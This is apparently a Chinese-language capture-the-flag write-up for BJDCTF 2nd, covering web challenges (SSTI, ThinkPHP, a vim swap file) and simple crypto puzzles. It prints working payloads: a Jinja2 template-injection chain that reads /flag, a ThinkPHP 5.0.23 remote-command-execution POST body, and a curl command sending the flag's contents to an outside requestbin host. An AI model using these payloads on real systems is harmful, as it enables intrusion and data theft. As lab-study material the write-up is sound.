BJDCTF 2nd-wp01

Web

1.fake google

在這裏插入圖片描述
打開題目的主要界面是一個谷歌的搜索界面,在搜索框輸入內容後會有一個新頁面
在這裏插入圖片描述
不管輸入什麼,輸出都是P3’s girlfriend is :xxxxxxx
在這個頁面查看源代碼,發現有一段被註釋的代碼

<!--ssssssti & a little trick --> P3's girlfirend is : <script>alert(1);</script><br><hr>

從這段代碼可以知道是ssti注入
試了試config,有回顯
在這裏插入圖片描述
查看flag

{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}

在這裏插入圖片描述

flag{fc4ec771-f9e0-4ad4-afe0-80dfd22dab37}

2.old-hack

在這裏插入圖片描述
查看源碼沒有什麼收穫,主頁上寫的thinkphp5,而版本就是5.0.23
查看根目錄,看到了flag

`POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /

在這裏插入圖片描述
查看flag

POST:_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag

在這裏插入圖片描述

flag{da977af6-5828-4a37-9f5b-e1c1d8f25ed5}

3.假豬套天下第一

隨便登陸就是這樣的界面
在這裏插入圖片描述
抓包有hint,查看L0g1in.php
在這裏插入圖片描述
卡了很久,大佬提示改時間戳
在這裏插入圖片描述
得到了flag
在這裏插入圖片描述

flag <!--ZmxhZ3s4YzImYzc3OC1INGYwLTQ2YWUtODM3YS 1mNDE4MDlwOGYyZTF9Cg==-->

4.

在這裏插入圖片描述
根據提示找到了po,但是沒有flag
在這裏插入圖片描述
跑一遍週期表

import requests

url = 'http://a61c516a-de45-486f-a5ad-0a55e8fb4c8f.node3.buuoj.cn//{}.php'
s = ['H', 'He', 'Li', 'Be', 'B', 'C', 'N', 'O', 'F', 'Ne', 'Na', 'Mg', 'Al', 'Si', 'P', 'S', 'Cl', 'Ar', 'K', 'Ca','Sc', 'Ti', 'V', 'Cr', 'Mn', 'Fe', 'Co', 'Ni', 'Cu', 'Zn', 'Ga', 'Ge', 'As', 'Se', 'Br', 'Kr', 'Rb', 'Sr', 'Y', 'Zr', 'Nb', 'Mo', 'Te', 'Ru', 'Rh', 'Pd', 'Ag', 'Cd', 'In', 'Sn', 'Sb', 'Te', 'I', 'Xe', 'Cs', 'Ba', 'La', 'Ce','Pr', 'Nd', 'Pm', 'Sm', 'Eu', 'Gd', 'Tb', 'Dy', 'Ho', 'Er', 'Tm', 'Yb', 'Lu', 'Hf', 'Ta', 'W', 'Re', 'Os', 'Ir','Pt', 'Au', 'Hg', 'Tl', 'Pb', 'Bi', 'Po', 'At', 'Rn', 'Fr', 'Ra', 'Ac', 'Th', 'Pa', 'U', 'Np', 'Pu', 'Am', 'Cm','Bk', 'Cf', 'Es', 'Fm', 'Md', 'No', 'Lr', 'Rf', 'Db', 'Sg', 'Bh', 'Hs', 'Mt', 'Ds', 'Rg', 'Cn', 'Nh', 'Fl', 'Mc','Lv', 'Ts', 'Og', 'Uue']
text = ''
for i in s:
    r = requests.get(url=url.format(i))
    if r.status_code != 404:
        print(i)
        text += r.text
        print(r.text)
        print(text)

5.duangShell

swp?直接index.php.swp
在這裏插入圖片描述
vim -r恢復
在這裏插入圖片描述

curl http://requestbin.xxx -X POST -d "`head /flag`"

得到flag

Crypto

1.簽到-y1ng

在這裏插入圖片描述
直接base64解碼 QkpEe1czbGMwbWVfVDBfQkpEQ1RGfQ==

flag:BJD{W3lc0me_T0_BJDCTF}

2.老文盲了

在這裏插入圖片描述
將文字轉化爲拼音可以知道文字就是flag

flag:BJD{罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鰳哵眔鞹鰝}

3.燕言燕語

在這裏插入圖片描述
通過題目解碼得到如下明文,但並不是flag
在這裏插入圖片描述
有兩端文字,想到了維吉尼亞密碼
在這裏插入圖片描述
yanzi就是密鑰,後面的密文,千千秀字可以直接解密
在這裏插入圖片描述

flag: BJD{yanzi_jiushige_shabi}

4.靈能精通

在這裏插入圖片描述
這是聖堂武士密碼,豬圈密碼的變種
在這裏插入圖片描述

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章